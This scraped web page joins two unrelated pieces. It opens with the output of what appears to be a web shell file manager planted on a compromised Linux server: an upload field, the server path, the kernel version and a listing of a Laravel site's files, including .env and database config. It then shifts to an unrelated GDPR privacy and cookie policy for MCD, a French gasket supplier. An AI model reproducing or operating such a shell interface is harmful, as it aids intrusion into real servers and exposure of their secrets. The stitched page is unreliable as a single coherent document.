/var/www/clients/client68/web162/public/
Linux web.en-prod.com 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
Upload File :

Name
Size
Permissions
Options
DL
--
drwxr-xr-x
Modules
--
drwxr-xr-x
app
--
drwxr-xr-x
assets
--
drwxr-xr-x
bootstrap
--
drwxr-xr-x
config
--
drwxr-xr-x
css
--
drwxr-xr-x
database
--
drwxr-xr-x
error
--
drwxr-xr-x
images
--
drwxr-xr-x
resources
--
drwxr-xr-x
stats
--
drwxr-xr-x
storage
--
drwxr-xr-x
tests
--
drwxr-xr-x
themes
--
drwxr-xr-x
vendor
--
drwxr-xr-x
.env
0.203 KB
-rw-r--r--
.htaccess
0.23 KB
-rw-r--r--
.index.html
0.976 KB
-rw-r--r--
artisan
1.597 KB
-rw-r--r--
asw.php
12.639 KB
-rw-r--r--
composer-setup.php
298.211 KB
-rw-r--r--
composer.json
2.249 KB
-rw-r--r--
composer.lock
217.445 KB
-rw-r--r--
composer.phar
1.73 MB
-rw-r--r--
db_config.php
0.087 KB
-rw-r--r--
favicon.ico
7.186 KB
-rw-r--r--
getcsv_joints.php
11.929 KB
-rw-r--r--
getcsv_plaques.php
11.307 KB
-rw-r--r--
gulpfile.js
0.491 KB
-rw-r--r--
index.php
1.732 KB
-rw-r--r--
joints.csv
59.488 KB
-rw-r--r--
joints5.csv
256.169 KB
-rw-r--r--
joints6.csv
68.705 KB
-rw-r--r--
package.json
0.077 KB
-rw-r--r--
phpspec.yml
0.085 KB
-rw-r--r--
phpunit.xml
0.712 KB
-rw-r--r--
plaques.csv
20.583 KB
-rw-r--r--
plaques.xlsx
17.574 KB
-rw-r--r--
plaques2.csv
20.536 KB
-rw-r--r--
plaques4.csv
32.382 KB
-rw-r--r--
plaques5.csv
24.341 KB
-rw-r--r--
plaques6.csv
37.581 KB
-rw-r--r--
plates4.csv
31.104 KB
-rw-r--r--
pulang.txt
0.206 KB
-rw-r--r--
readme.md
4.86 KB
-rw-r--r--
robots.txt
0.014 KB
-rw-r--r--
server.php
0.548 KB
-rw-r--r--
Coded by : TrenggalekTeam
Privacy Policy

Privacy Policy

Introduction

The company MCD, SAS with capital of 713 000 euros located Le Vieux Château, 02300 Guny - France, registered under the RCS SAINT-QUENTIN n ° 384 572 483 is brought to collect personal data within the framework of its activity.

By visiting our website https://www.plate-heat-exchanger-gasket.com, we may collect personal data about you.
For any question relating to the processing of personal data, data subjects may send an email specifying their request to service.export@mcd-maintenance.com.

Treatment modalities and purposes

The data processed by MCD are collected, recorded and stored in accordance with the provisions of the law relating to data, files and freedoms of 6 January 1978 in its version in force on the date hereof, as well as with the provisions of the General Data Protection Regulation (GDPR).

The data collected corresponds to the information you send us on the contact forms available online, or via the cookies placed on your browser during your visit to our site. As part of our activity, we are also required to access data related to your professional activity. We may also act as a subcontractor, within the meaning of section 4 of the GDPR, when we process, at your request and under your control, the data of your customers.

The processing of this data is necessary to provide the services mentioned on our website. They allow us to respond to your requests.

Your browsing information allows us to know how you use or plan to use our services.

The duration of the conversation

The data is kept for the time necessary to provide the services offered by MCD.
The data is kept for the duration of the contract that binds us and for a period of three months after the termination of your contract.
If you are not yet a customer, your data is kept for a period of 3 years from the date you interviewed us and you are on our site, to allow us to better answer your questions if you we are asking again. The data is then archived and returned exclusively in the context of litigation, during the period of the legal prescription.

Exercise of rights

Each data subject has the right to access, modify, rectify, erase and, where applicable, portability of his / her personal data, in accordance with the provisions of the Data Protection, Data Protection and Data Protection Act. the freedoms of January 6, 1978 in its version in force on the date hereof, and in accordance with Community regulations.

The right of access, modification, rectification and erasure provided for in the preceding paragraph, is exercised at the following email address: service.export@mcd-maintenance.com.

When the request for access, modification, correction or deletion is addressed to MCD, MCD applies the terms and conditions provided by the user, subject to their compliance with the applicable regulations and their prior notification.

In case of difficulty related to the management of his personal data, the data subject has the right to lodge a complaint with the CNIL or with any competent supervisory authority.

Cookies

Cookies and plotters can be automatically installed on your browser or your device, when you access our site or our application. A cookie is an element that does not identify a person but is used to record information relating to the navigation of it on the MCD site.

What are the cookies that can be installed when you visit our site or our application?
In our case, we use cookies and plotters to help you navigate our site and application, and offer you services that are better suited to your requests by knowing your browsing habits. Cookies also allow us to have statistical tools on the use of our site and application to improve them regularly.

Lifetime of cookies?
There are two types of cookies: session cookies and persistent cookies. Session cookies are created temporarily in your browser's subfolder when you visit a website. Once you leave the site, the session cookie is deleted.

Persistent cookie files remain in your browser's subfolder and are reactivated once you visit the website that created this specific cookie.
A persistent cookie remains in the browser subfolder for the duration defined in the cookie file.
In general, the validity period of a cookie is 13 months maximum.

Can I refuse to store cookies on my computer?
You do not have to accept the deposit of cookies on your device. However, we can not guarantee you the same user experience if you delete cookies.

How to set up and delete cookies?
You can disable cookies via Browsers, here are the links:
For Internet Explorer: http://windows.microsoft.com/en-US/windows-vista/Block-or-allow-cookies
For Safari: https://support.apple.com/kb/ph17191?locale=en_US&viewlocale=en_US
For Chrome: http://support.google.com/chrome/bin/answer.py?hl=en&hlrm=en&answer=95647
For Firefox: https://support.mozilla.org/en/kb/activate-deactivate-cookies
For Opera: http://help.opera.com/Windows/10.20/en/cookies.html
This configuration differs on a mobile terminal or tablet.

For iOS: https://support.apple.com/en-us/HT201265
For Android: http://www.wikihow.com/Disable-Cookies#Android_Devices
For Blackberry: http://global.blackberry.com/en/legal/privacy-policy.html#types-info-d
For Windows Phone: https://support.microsoft.com/en-us/help/17442/windows-internet-explorer-delete-manage-cookies
Finally, it is possible to set the terminal browser so that it sends a code indicating websites that do not want to be tracked. This option is commonly called "Do Not Track".

For Internet Explorer: http://windows.microsoft.com/en-us/internet-explorer/use-tracking-protection#ie=ie-11
For Safari: http://support.apple.com/kb/PH11952
For Chrome: https://support.google.com/chrome/answer/114836
For Firefox: https://support.mozilla.org/en/kb/how-to-activate-option-ne-not-pister
For Opera: http://help.opera.com/Windows/12.10/en/notrack.html

Be careful, however, the browser settings are likely to change over time